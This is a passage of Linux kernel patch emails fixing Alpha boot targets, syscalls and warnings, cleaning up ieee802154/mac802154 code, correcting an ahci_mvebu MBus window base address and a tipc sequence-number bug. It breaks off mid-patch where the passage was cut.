a/arch/alpha/oprofile/op_model_ev4.c b/arch/alpha/oprofile/op_model_ev4.c index 18aa9b4f94f1..086a0d5445c5 100644 --- a/arch/alpha/oprofile/op_model_ev4.c +++ b/arch/alpha/oprofile/op_model_ev4.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev5.c b/arch/alpha/oprofile/op_model_ev5.c index c32f8a0ad925..c300f5ef3482 100644 --- a/arch/alpha/oprofile/op_model_ev5.c +++ b/arch/alpha/oprofile/op_model_ev5.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev6.c b/arch/alpha/oprofile/op_model_ev6.c index 1c84cc257fc7..02edf5971614 100644 --- a/arch/alpha/oprofile/op_model_ev6.c +++ b/arch/alpha/oprofile/op_model_ev6.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev67.c b/arch/alpha/oprofile/op_model_ev67.c index 34a57a126553..adb1744d20f3 100644 --- a/arch/alpha/oprofile/op_model_ev67.c +++ b/arch/alpha/oprofile/op_model_ev67.c @@ -9,7 +9,6 @@ */ #include -#include #include #include From 9f7b2d1f02c5dae9c7fd59848681c88dc3741819 Mon Sep 17 00:00:00 2001 From: Alex Dowad Date: Fri, 13 Mar 2015 20:04:17 +0200 Subject: [PATCH 256/872] alpha: copy_thread(): rename 'arg' argument to 'kthread_arg' The 'arg' argument to copy_thread() is only ever used when forking a new kernel thread. Hence, rename it to 'kthread_arg' for clarity (and consistency with do_fork() and other arch-specific implementations of copy_thread()). Signed-off-by: Alex Dowad Signed-off-by: Matt Turner --- arch/alpha/kernel/process.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/arch/alpha/kernel/process.c b/arch/alpha/kernel/process.c index 1941a07b5811..84d13263ce46 100644 --- a/arch/alpha/kernel/process.c +++ b/arch/alpha/kernel/process.c @@ -236,12 +236,11 @@ release_thread(struct task_struct *dead_task) } /* - * Copy an alpha thread.. + * Copy architecture-specific thread state */ - int copy_thread(unsigned long clone_flags, unsigned long usp, - unsigned long arg, + unsigned long kthread_arg, struct task_struct *p) { extern void ret_from_fork(void); @@ -262,7 +261,7 @@ copy_thread(unsigned long clone_flags, unsigned long usp, sizeof(struct switch_stack) + sizeof(struct pt_regs)); childstack->r26 = (unsigned long) ret_from_kernel_thread; childstack->r9 = usp; /* function */ - childstack->r10 = arg; + childstack->r10 = kthread_arg; childregs->hae = alpha_mv.hae_cache, childti->pcb.usp = 0; return 0; From 234306038064131a77da176d41e89e2c1535cda9 Mon Sep 17 00:00:00 2001 From: Helge Deller Date: Mon, 23 Mar 2015 22:47:21 +0100 Subject: [PATCH 257/872] alpha: Fix bootpfile and bootpzfile make targets Fix the bootpfile and bootpzfile make targets to creat BOOTP images. Both targets were broken due to some missing defines to re-map ELF constants. In addition the old code used the generic vsprintf function of the kernel which we now replace by a simple and much smaller implementation for the bootloader. Signed-off-by: Helge Deller Signed-off-by: Matt Turner --- arch/alpha/boot/Makefile | 16 +- arch/alpha/boot/main.c | 1 - arch/alpha/boot/stdio.c | 306 +++++++++++++++++++++++++++++++ arch/alpha/boot/tools/objstrip.c | 3 + 4 files changed, 319 insertions(+), 7 deletions(-) create mode 100644 arch/alpha/boot/stdio.c diff --git a/arch/alpha/boot/Makefile b/arch/alpha/boot/Makefile index cd143887380a..8399bd0e68e8 100644 --- a/arch/alpha/boot/Makefile +++ b/arch/alpha/boot/Makefile @@ -14,6 +14,9 @@ targets := vmlinux.gz vmlinux \ tools/bootpzh bootloader bootpheader bootpzheader OBJSTRIP := $(obj)/tools/objstrip +HOSTCFLAGS := -Wall -I$(objtree)/usr/include +BOOTCFLAGS += -I$(obj) -I$(srctree)/$(obj) + # SRM bootable image. Copy to offset 512 of a partition. $(obj)/bootimage: $(addprefix $(obj)/tools/,mkbb lxboot bootlx) $(obj)/vmlinux.nh ( cat $(obj)/tools/lxboot $(obj)/tools/bootlx $(obj)/vmlinux.nh ) > $@ @@ -96,13 +99,14 @@ $(obj)/tools/bootph: $(obj)/bootpheader $(OBJSTRIP) FORCE $(obj)/tools/bootpzh: $(obj)/bootpzheader $(OBJSTRIP) FORCE $(call if_changed,objstrip) -LDFLAGS_bootloader := -static -uvsprintf -T #-N -relax -LDFLAGS_bootpheader := -static -uvsprintf -T #-N -relax -LDFLAGS_bootpzheader := -static -uvsprintf -T #-N -relax +LDFLAGS_bootloader := -static -T # -N -relax +LDFLAGS_bootloader := -static -T # -N -relax +LDFLAGS_bootpheader := -static -T # -N -relax +LDFLAGS_bootpzheader := -static -T # -N -relax -OBJ_bootlx := $(obj)/head.o $(obj)/main.o -OBJ_bootph := $(obj)/head.o $(obj)/bootp.o -OBJ_bootpzh := $(obj)/head.o $(obj)/bootpz.o $(obj)/misc.o +OBJ_bootlx := $(obj)/head.o $(obj)/stdio.o $(obj)/main.o +OBJ_bootph := $(obj)/head.o $(obj)/stdio.o $(obj)/bootp.o +OBJ_bootpzh := $(obj)/head.o $(obj)/stdio.o $(obj)/bootpz.o $(obj)/misc.o $(obj)/bootloader: $(obj)/bootloader.lds $(OBJ_bootlx) $(LIBS_Y) FORCE $(call if_changed,ld) diff --git a/arch/alpha/boot/main.c b/arch/alpha/boot/main.c index 3baf2d1e908d..dd6eb4a33582 100644 --- a/arch/alpha/boot/main.c +++ b/arch/alpha/boot/main.c @@ -19,7 +19,6 @@ #include "ksize.h" -extern int vsprintf(char *, const char *, va_list); extern unsigned long switch_to_osf_pal(unsigned long nr, struct pcb_struct * pcb_va, struct pcb_struct * pcb_pa, unsigned long *vptb); diff --git a/arch/alpha/boot/stdio.c b/arch/alpha/boot/stdio.c new file mode 100644 index 000000000000..f844dae8a54a --- /dev/null +++ b/arch/alpha/boot/stdio.c @@ -0,0 +1,306 @@ +/* + * Copyright (C) Paul Mackerras 1997. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + */ +#include +#include + +size_t strnlen(const char * s, size_t count) +{ + const char *sc; + + for (sc = s; count-- && *sc != '\0'; ++sc) + /* nothing */; + return sc - s; +} + +# define do_div(n, base) ({ \ + unsigned int __base = (base); \ + unsigned int __rem; \ + __rem = ((unsigned long long)(n)) % __base; \ + (n) = ((unsigned long long)(n)) / __base; \ + __rem; \ +}) + + +static int skip_atoi(const char **s) +{ + int i, c; + + for (i = 0; '0' <= (c = **s) && c <= '9'; ++*s) + i = i*10 + c - '0'; + return i; +} + +#define ZEROPAD 1 /* pad with zero */ +#define SIGN 2 /* unsigned/signed long */ +#define PLUS 4 /* show plus */ +#define SPACE 8 /* space if plus */ +#define LEFT 16 /* left justified */ +#define SPECIAL 32 /* 0x */ +#define LARGE 64 /* use 'ABCDEF' instead of 'abcdef' */ + +static char * number(char * str, unsigned long long num, int base, int size, int precision, int type) +{ + char c,sign,tmp[66]; + const char *digits="0123456789abcdefghijklmnopqrstuvwxyz"; + int i; + + if (type & LARGE) + digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + if (type & LEFT) + type &= ~ZEROPAD; + if (base < 2 || base > 36) + return 0; + c = (type & ZEROPAD) ? '0' : ' '; + sign = 0; + if (type & SIGN) { + if ((signed long long)num < 0) { + sign = '-'; + num = - (signed long long)num; + size--; + } else if (type & PLUS) { + sign = '+'; + size--; + } else if (type & SPACE) { + sign = ' '; + size--; + } + } + if (type & SPECIAL) { + if (base == 16) + size -= 2; + else if (base == 8) + size--; + } + i = 0; + if (num == 0) + tmp[i++]='0'; + else while (num != 0) { + tmp[i++] = digits[do_div(num, base)]; + } + if (i > precision) + precision = i; + size -= precision; + if (!(type&(ZEROPAD+LEFT))) + while(size-->0) + *str++ = ' '; + if (sign) + *str++ = sign; + if (type & SPECIAL) { + if (base==8) + *str++ = '0'; + else if (base==16) { + *str++ = '0'; + *str++ = digits[33]; + } + } + if (!(type & LEFT)) + while (size-- > 0) + *str++ = c; + while (i < precision--) + *str++ = '0'; + while (i-- > 0) + *str++ = tmp[i]; + while (size-- > 0) + *str++ = ' '; + return str; +} + +int vsprintf(char *buf, const char *fmt, va_list args) +{ + int len; + unsigned long long num; + int i, base; + char * str; + const char *s; + + int flags; /* flags to number() */ + + int field_width; /* width of output field */ + int precision; /* min. # of digits for integers; max + number of chars for from string */ + int qualifier; /* 'h', 'l', or 'L' for integer fields */ + /* 'z' support added 23/7/1999 S.H. */ + /* 'z' changed to 'Z' --davidm 1/25/99 */ + + + for (str=buf ; *fmt ; ++fmt) { + if (*fmt != '%') { + *str++ = *fmt; + continue; + } + + /* process flags */ + flags = 0; + repeat: + ++fmt; /* this also skips first '%' */ + switch (*fmt) { + case '-': flags |= LEFT; goto repeat; + case '+': flags |= PLUS; goto repeat; + case ' ': flags |= SPACE; goto repeat; + case '#': flags |= SPECIAL; goto repeat; + case '0': flags |= ZEROPAD; goto repeat; + } + + /* get field width */ + field_width = -1; + if ('0' <= *fmt && *fmt <= '9') + field_width = skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + field_width = va_arg(args, int); + if (field_width < 0) { + field_width = -field_width; + flags |= LEFT; + } + } + + /* get the precision */ + precision = -1; + if (*fmt == '.') { + ++fmt; + if ('0' <= *fmt && *fmt <= '9') + precision = skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + precision = va_arg(args, int); + } + if (precision < 0) + precision = 0; + } + + /* get the conversion qualifier */ + qualifier = -1; + if (*fmt == 'l' && *(fmt + 1) == 'l') { + qualifier = 'q'; + fmt += 2; + } else if (*fmt == 'h' || *fmt == 'l' || *fmt == 'L' + || *fmt == 'Z') { + qualifier = *fmt; + ++fmt; + } + + /* default base */ + base = 10; + + switch (*fmt) { + case 'c': + if (!(flags & LEFT)) + while (--field_width > 0) + *str++ = ' '; + *str++ = (unsigned char) va_arg(args, int); + while (--field_width > 0) + *str++ = ' '; + continue; + + case 's': + s = va_arg(args, char *); + if (!s) + s = ""; + + len = strnlen(s, precision); + + if (!(flags & LEFT)) + while (len < field_width--) + *str++ = ' '; + for (i = 0; i < len; ++i) + *str++ = *s++; + while (len < field_width--) + *str++ = ' '; + continue; + + case 'p': + if (field_width == -1) { + field_width = 2*sizeof(void *); + flags |= ZEROPAD; + } + str = number(str, + (unsigned long) va_arg(args, void *), 16, + field_width, precision, flags); + continue; + + + case 'n': + if (qualifier == 'l') { + long * ip = va_arg(args, long *); + *ip = (str - buf); + } else if (qualifier == 'Z') { + size_t * ip = va_arg(args, size_t *); + *ip = (str - buf); + } else { + int * ip = va_arg(args, int *); + *ip = (str - buf); + } + continue; + + case '%': + *str++ = '%'; + continue; + + /* integer number formats - set up the flags and "break" */ + case 'o': + base = 8; + break; + + case 'X': + flags |= LARGE; + case 'x': + base = 16; + break; + + case 'd': + case 'i': + flags |= SIGN; + case 'u': + break; + + default: + *str++ = '%'; + if (*fmt) + *str++ = *fmt; + else + --fmt; + continue; + } + if (qualifier == 'l') { + num = va_arg(args, unsigned long); + if (flags & SIGN) + num = (signed long) num; + } else if (qualifier == 'q') { + num = va_arg(args, unsigned long long); + if (flags & SIGN) + num = (signed long long) num; + } else if (qualifier == 'Z') { + num = va_arg(args, size_t); + } else if (qualifier == 'h') { + num = (unsigned short) va_arg(args, int); + if (flags & SIGN) + num = (signed short) num; + } else { + num = va_arg(args, unsigned int); + if (flags & SIGN) + num = (signed int) num; + } + str = number(str, num, base, field_width, precision, flags); + } + *str = '\0'; + return str-buf; +} + +int sprintf(char * buf, const char *fmt, ...) +{ + va_list args; + int i; + + va_start(args, fmt); + i=vsprintf(buf,fmt,args); + va_end(args); + return i; +} diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c index 367d53d031fc..dee82695f48b 100644 --- a/arch/alpha/boot/tools/objstrip.c +++ b/arch/alpha/boot/tools/objstrip.c @@ -27,6 +27,9 @@ #include #ifdef __ELF__ # include +# define elfhdr elf64_hdr +# define elf_phdr elf64_phdr +# define elf_check_arch(x) ((x)->e_machine == EM_ALPHA) #endif /* bootfile size must be multiple of BLOCK_SIZE: */ From 228fa858e5865c9407b0d6710fd504e0b68bc371 Mon Sep 17 00:00:00 2001 From: Chen Gang Date: Mon, 18 May 2015 12:36:50 +0800 Subject: [PATCH 258/872] alpha: Wire up all missing implemented syscalls And still left the missing unimplemented syscalls as warnings. The related warnings for missing implemented syscalls: CALL scripts/checksyscalls.sh :1241:2: warning: #warning syscall getrandom not implemented [-Wcpp] :1244:2: warning: #warning syscall memfd_create not implemented [-Wcpp] :1250:2: warning: #warning syscall execveat not implemented [-Wcpp] Signed-off-by: Chen Gang Signed-off-by: Matt Turner --- arch/alpha/include/asm/unistd.h | 2 +- arch/alpha/include/uapi/asm/unistd.h | 3 +++ arch/alpha/kernel/systbls.S | 3 +++ 3 files changed, 7 insertions(+), 1 deletion(-) diff --git a/arch/alpha/include/asm/unistd.h b/arch/alpha/include/asm/unistd.h index c509d306db45..a56e608db2f9 100644 --- a/arch/alpha/include/asm/unistd.h +++ b/arch/alpha/include/asm/unistd.h @@ -3,7 +3,7 @@ #include -#define NR_SYSCALLS 511 +#define NR_SYSCALLS 514 #define __ARCH_WANT_OLD_READDIR #define __ARCH_WANT_STAT64 diff --git a/arch/alpha/include/uapi/asm/unistd.h b/arch/alpha/include/uapi/asm/unistd.h index d214a0358100..aa33bf5aacb6 100644 --- a/arch/alpha/include/uapi/asm/unistd.h +++ b/arch/alpha/include/uapi/asm/unistd.h @@ -472,5 +472,8 @@ #define __NR_sched_setattr 508 #define __NR_sched_getattr 509 #define __NR_renameat2 510 +#define __NR_getrandom 511 +#define __NR_memfd_create 512 +#define __NR_execveat 513 #endif /* _UAPI_ALPHA_UNISTD_H */ diff --git a/arch/alpha/kernel/systbls.S b/arch/alpha/kernel/systbls.S index 24789713f1ea..9b62e3fd4f03 100644 --- a/arch/alpha/kernel/systbls.S +++ b/arch/alpha/kernel/systbls.S @@ -529,6 +529,9 @@ sys_call_table: .quad sys_sched_setattr .quad sys_sched_getattr .quad sys_renameat2 /* 510 */ + .quad sys_getrandom + .quad sys_memfd_create + .quad sys_execveat .size sys_call_table, . - sys_call_table .type sys_call_table, @object From cceaeddc2edf710141563c65808b5cea6829b925 Mon Sep 17 00:00:00 2001 From: Chen Gang Date: Mon, 18 May 2015 12:37:08 +0800 Subject: [PATCH 259/872] alpha: kernel: osf_sys: Set 'kts.tv_nsec' only when 'tv' has effect The related warning: CC init/do_mounts.o arch/alpha/kernel/osf_sys.c: In function 'SyS_osf_settimeofday': arch/alpha/kernel/osf_sys.c:1028:14: warning: 'kts.tv_nsec' may be used uninitialized in this function [-Wmaybe-uninitialized] kts.tv_nsec *= 1000; ^ arch/alpha/kernel/osf_sys.c:1016:18: note: 'kts' was declared here struct timespec kts; ^ Signed-off-by: Chen Gang Signed-off-by: Matt Turner --- arch/alpha/kernel/osf_sys.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/alpha/kernel/osf_sys.c b/arch/alpha/kernel/osf_sys.c index e51f578636a5..36dc91ace83a 100644 --- a/arch/alpha/kernel/osf_sys.c +++ b/arch/alpha/kernel/osf_sys.c @@ -1019,14 +1019,13 @@ SYSCALL_DEFINE2(osf_settimeofday, struct timeval32 __user *, tv, if (tv) { if (get_tv32((struct timeval *)&kts, tv)) return -EFAULT; + kts.tv_nsec *= 1000; } if (tz) { if (copy_from_user(&ktz, tz, sizeof(*tz))) return -EFAULT; } - kts.tv_nsec *= 1000; - return do_sys_settimeofday(tv ? &kts : NULL, tz ? &ktz : NULL); } From b251d4de671ca0623d19b88a8af7f038499db631 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:29 +0300 Subject: [PATCH 260/872] Documentation/networking/ieee802154.txt: fix various inaccuracies. * Update the linux-zigbee git:// repository URL. * Remove the MLME section as the current kernel does not provide a full 802.15.4 MLME implementation. * The hardmac example driver 'fakehard' was removed some time ago. * The IEEE 802.15.4 device drivers live in drivers/net/ieee802154/, not in drivers/ieee802154/. * The IEEE 802.15.4 MTU is 127 bytes, not 128 bytes. * Some of the 6LoWPAN code lives in net/6lowpan/. Signed-off-by: Lennert Buytenhek Reviewed-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- Documentation/networking/ieee802154.txt | 32 +++++++++---------------- 1 file changed, 11 insertions(+), 21 deletions(-) diff --git a/Documentation/networking/ieee802154.txt b/Documentation/networking/ieee802154.txt index 22bbc7225f8e..1700756af057 100644 --- a/Documentation/networking/ieee802154.txt +++ b/Documentation/networking/ieee802154.txt @@ -30,8 +30,8 @@ int sd = socket(PF_IEEE802154, SOCK_DGRAM, 0); The address family, socket addresses etc. are defined in the include/net/af_ieee802154.h header or in the special header -in our userspace package (see either linux-zigbee sourceforge download page -or git tree at git://linux-zigbee.git.sourceforge.net/gitroot/linux-zigbee). +in the userspace package (see either http://wpan.cakelab.org/ or the +git tree at https://github.com/linux-wpan/wpan-tools). One can use SOCK_RAW for passing raw data towards device xmit function. YMMV. @@ -49,15 +49,6 @@ Like with WiFi, there are several types of devices implementing IEEE 802.15.4. Those types of devices require different approach to be hooked into Linux kernel. -MLME - MAC Level Management -============================ - -Most of IEEE 802.15.4 MLME interfaces are directly mapped on netlink commands. -See the include/net/nl802154.h header. Our userspace tools package -(see above) provides CLI configuration utility for radio interfaces and simple -coordinator for IEEE 802.15.4 networks as an example users of MLME protocol. - - HardMAC ======= @@ -75,8 +66,6 @@ net_device with a pointer to struct ieee802154_mlme_ops instance. The fields assoc_req, assoc_resp, disassoc_req, start_req, and scan_req are optional. All other fields are required. -We provide an example of simple HardMAC driver at drivers/ieee802154/fakehard.c - SoftMAC ======= @@ -89,7 +78,8 @@ stack interface for network sniffers (e.g. WireShark). This layer is going to be extended soon. -See header include/net/mac802154.h and several drivers in drivers/ieee802154/. +See header include/net/mac802154.h and several drivers in +drivers/net/ieee802154/. Device drivers API @@ -114,18 +104,17 @@ Moreover IEEE 802.15.4 device operations structure should be filled. Fake drivers ============ -In addition there are two drivers available which simulate real devices with -HardMAC (fakehard) and SoftMAC (fakelb - IEEE 802.15.4 loopback driver) -interfaces. This option provides possibility to test and debug stack without -usage of real hardware. +In addition there is a driver available which simulates a real device with +SoftMAC (fakelb - IEEE 802.15.4 loopback driver) interface. This option +provides possibility to test and debug stack without usage of real hardware. -See sources in drivers/ieee802154 folder for more details. +See sources in drivers/net/ieee802154 folder for more details. 6LoWPAN Linux implementation ============================ -The IEEE 802.15.4 standard specifies an MTU of 128 bytes, yielding about 80 +The IEEE 802.15.4 standard specifies an MTU of 127 bytes, yielding about 80 octets of actual MAC payload once security is turned on, on a wireless link with a link throughput of 250 kbps or less. The 6LoWPAN adaptation format [RFC4944] was specified to carry IPv6 datagrams over such constrained links, @@ -140,7 +129,8 @@ In Semptember 2011 the standard update was published - [RFC6282]. It deprecates HC1 and HC2 compression and defines IPHC encoding format which is used in this Linux implementation. -All the code related to 6lowpan you may find in files: net/ieee802154/6lowpan.* +All the code related to 6lowpan you may find in files: net/6lowpan/* +and net/ieee802154/6lowpan/* To setup 6lowpan interface you need (busybox release > 1.17.0): 1. Add IEEE802.15.4 interface and initialize PANid; From d0997b44c9081071e39417b188f7db6d1ea37341 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:33 +0300 Subject: [PATCH 261/872] ieee802154: Remove ieee802154_reduced_mlme_ops references. As there doesn't seem to be a definition of it or any users of it. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/ieee802154_netdev.h | 6 ------ 1 file changed, 6 deletions(-) diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 84a72a1382a8..0a87975128ec 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -430,10 +430,4 @@ ieee802154_mlme_ops(const struct net_device *dev) return dev->ml_priv; } -static inline struct ieee802154_reduced_mlme_ops * -ieee802154_reduced_mlme_ops(const struct net_device *dev) -{ - return dev->ml_priv; -} - #endif From 01c8d2bbd407a178f5bfe0312c32aec345066697 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:39 +0300 Subject: [PATCH 262/872] ieee802154: Remove 802.15.4/6LoWPAN checks for interface MTU. In the past, 802.15.4 interfaces and 6LoWPAN interfaces used the same dev->type (ARPHRD_IEEE802154), and 802.15.4 interfaces were distinguished from 6LoWPAN interfaces by their differing dev->mtu. 6LoWPAN interfaces have their own ARPHRD type now, so there is no longer any need to check dev->mtu to distinguish 802.15.4 devices from 6LoWPAN devices. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl-mac.c | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index ada58a81b753..3503c38954f9 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -168,10 +168,7 @@ static struct net_device *ieee802154_nl_get_dev(struct genl_info *info) if (!dev) return NULL; - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. - */ - if (dev->type != ARPHRD_IEEE802154 || dev->mtu != IEEE802154_MTU) { + if (dev->type != ARPHRD_IEEE802154) { dev_put(dev); return NULL; } @@ -455,11 +452,7 @@ int ieee802154_dump_iface(struct sk_buff *skb, struct netlink_callback *cb) idx = 0; for_each_netdev(net, dev) { - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. - */ - if (idx < s_idx || dev->type != ARPHRD_IEEE802154 || - dev->mtu != IEEE802154_MTU) + if (idx < s_idx || dev->type != ARPHRD_IEEE802154) goto cont; if (ieee802154_nl_fill_iface(skb, NETLINK_CB(cb->skb).portid, @@ -789,11 +782,7 @@ ieee802154_llsec_dump_table(struct sk_buff *skb, struct netlink_callback *cb, int rc; for_each_netdev(net, dev) { - /* Check on mtu is currently a hacked solution because lowpan - * and wpan have the same ARPHRD type. - */ - if (idx < first_dev || dev->type != ARPHRD_IEEE802154 || - dev->mtu != IEEE802154_MTU) + if (idx < first_dev || dev->type != ARPHRD_IEEE802154) goto skip; data.ops = ieee802154_mlme_ops(dev); From 66a3297f6d3f9dc35e27c3cec6b4437ac13f07ff Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:45 +0300 Subject: [PATCH 263/872] ieee802154 socket: No need to check for ARPHRD_IEEE802154 in raw_bind(). ieee802154_get_dev() only returns devices that have dev->type == ARPHRD_IEEE802154, therefore, there is no need to check this again in raw_bind(). Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/socket.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index d9fc5ccb1d0d..02abef2c1621 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -226,15 +226,9 @@ static int raw_bind(struct sock *sk, struct sockaddr *_uaddr, int len) goto out; } - if (dev->type != ARPHRD_IEEE802154) { - err = -ENODEV; - goto out_put; - } - sk->sk_bound_dev_if = dev->ifindex; sk_dst_reset(sk); -out_put: dev_put(dev); out: release_sock(sk); From 641459ca336edc009e044b76d16ee3d1ca6464c0 Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:51 +0300 Subject: [PATCH 264/872] mac802154: mac802154_mlme_start_req() optimisation. mac802154_mlme_start_req() calls ieee802154_mlme_ops(dev)->llsec->set_params() on the net_device passed into it, however, this net_device will always be a mac802154 net_device, so just call mac802154_set_params() directly instead. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/mac_cmd.c | 29 +++++++++++------------------ 1 file changed, 11 insertions(+), 18 deletions(-) diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 5220c2b2735b..8606da459ff3 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -36,8 +36,8 @@ static int mac802154_mlme_start_req(struct net_device *dev, u8 pan_coord, u8 blx, u8 coord_realign) { - struct ieee802154_mlme_ops *ops = ieee802154_mlme_ops(dev); - int rc = 0; + struct ieee802154_llsec_params params; + int changed = 0; ASSERT_RTNL(); @@ -47,26 +47,19 @@ static int mac802154_mlme_start_req(struct net_device *dev, dev->ieee802154_ptr->short_addr = addr->short_addr; mac802154_dev_set_page_channel(dev, page, channel); - if (ops->llsec) { - struct ieee802154_llsec_params params; - int changed = 0; + params.pan_id = addr->pan_id; + changed |= IEEE802154_LLSEC_PARAM_PAN_ID; - params.coord_shortaddr = addr->short_addr; - changed |= IEEE802154_LLSEC_PARAM_COORD_SHORTADDR; + params.hwaddr = ieee802154_devaddr_from_raw(dev->dev_addr); + changed |= IEEE802154_LLSEC_PARAM_HWADDR; - params.pan_id = addr->pan_id; - changed |= IEEE802154_LLSEC_PARAM_PAN_ID; + params.coord_hwaddr = params.hwaddr; + changed |= IEEE802154_LLSEC_PARAM_COORD_HWADDR; - params.hwaddr = ieee802154_devaddr_from_raw(dev->dev_addr); - changed |= IEEE802154_LLSEC_PARAM_HWADDR; + params.coord_shortaddr = addr->short_addr; + changed |= IEEE802154_LLSEC_PARAM_COORD_SHORTADDR; - params.coord_hwaddr = params.hwaddr; - changed |= IEEE802154_LLSEC_PARAM_COORD_HWADDR; - - rc = ops->llsec->set_params(dev, ¶ms, changed); - } - - return rc; + return mac802154_set_params(dev, ¶ms, changed); } static int mac802154_set_mac_params(struct net_device *dev, From e96998fc200867f005dd14c7d1dd35e1107d4914 Mon Sep 17 00:00:00 2001 From: Nadav Haklai Date: Tue, 26 May 2015 18:47:23 +0200 Subject: [PATCH 265/872] ata: ahci_mvebu: Fix wrongly set base address for the MBus window setting According to the Armada 38x datasheet, the window base address registers value is set in bits [31:4] of the register and corresponds to the transaction address bits [47:20]. Therefore, the 32bit base address value should be shifted right by 20bits and left by 4bits, resulting in 16 bit shift right. The bug as not been noticed yet because if the memory available on the platform is less than 2GB, then the base address is zero. [gregory.clement@free-electrons.com: add extra-explanation] Fixes: a3464ed2f14 (ata: ahci_mvebu: new driver for Marvell Armada 380 AHCI interfaces) Signed-off-by: Nadav Haklai Reviewed-by: Omri Itach Signed-off-by: Gregory CLEMENT Cc: Signed-off-by: Tejun Heo --- drivers/ata/ahci_mvebu.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ata/ahci_mvebu.c b/drivers/ata/ahci_mvebu.c index 23716dd8a7ec..5928d0746a27 100644 --- a/drivers/ata/ahci_mvebu.c +++ b/drivers/ata/ahci_mvebu.c @@ -45,7 +45,7 @@ static void ahci_mvebu_mbus_config(struct ahci_host_priv *hpriv, writel((cs->mbus_attr << 8) | (dram->mbus_dram_target_id << 4) | 1, hpriv->mmio + AHCI_WINDOW_CTRL(i)); - writel(cs->base, hpriv->mmio + AHCI_WINDOW_BASE(i)); + writel(cs->base >> 16, hpriv->mmio + AHCI_WINDOW_BASE(i)); writel(((cs->size - 1) & 0xffff0000), hpriv->mmio + AHCI_WINDOW_SIZE(i)); } From fc4f80524368dbf3fa2eba639c7b79bb014aea0a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Tue, 26 May 2015 23:11:31 +0200 Subject: [PATCH 266/872] nl802154: fix cca mode wpan phy flag This patch fix the handling to call cca mode setting. If the phy isn't flag then the driver doesn't support this setting. Signed-off-by: Alexander Aring Reported-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 54f4959fc9bb..212a795b33c9 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -757,7 +757,7 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) struct cfg802154_registered_device *rdev = info->user_ptr[0]; struct wpan_phy_cca cca; - if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE) + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_MODE)) return -EOPNOTSUPP; if (!info->attrs[NL802154_ATTR_CCA_MODE]) From f3903bcc0091df871ac64261f65ed2e4c3519d39 Mon Sep 17 00:00:00 2001 From: Jon Paul Maloy Date: Tue, 26 May 2015 05:40:19 -0400 Subject: [PATCH 267/872] tipc: fix bug in link protocol message create function In commit dd3f9e70f59f43a5712eba9cf3ee4f1e6999540c ("tipc: add packet sequence number at instant of transmission") we made a change with the consequence that packets in the link backlog queue don't contain valid sequence numbers. However, when we create a link protocol message, we still use the sequence number of the first packet in the backlog, if there is any, as "next_sent" indicator in the message. This may entail unnecessary retransissions or stale packet transmission when there is very low traffic on the link. This commit fixes this issue by only using the current value of tipc_link::snd_nxt as indicator. Signed-off-by: Jon Maloy Signed-off-by: David S. Miller --- net/tipc/link.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/net/tipc/link.c b/net/tipc/link.c index fb2a003c8e6d..ca8b8e0f49b5 100644 --- a/net/tipc/link.c +++ b/net/tipc/link.c @@ -1320,8 +1320,6 @@ void tipc_link_proto_xmit(struct tipc_link *l_ptr, u32 msg_typ, int probe_msg, if (!tipc_link_is_up(l_ptr)) return; - if (skb_queue_len(&l_ptr->backlogq)) - next_sent = 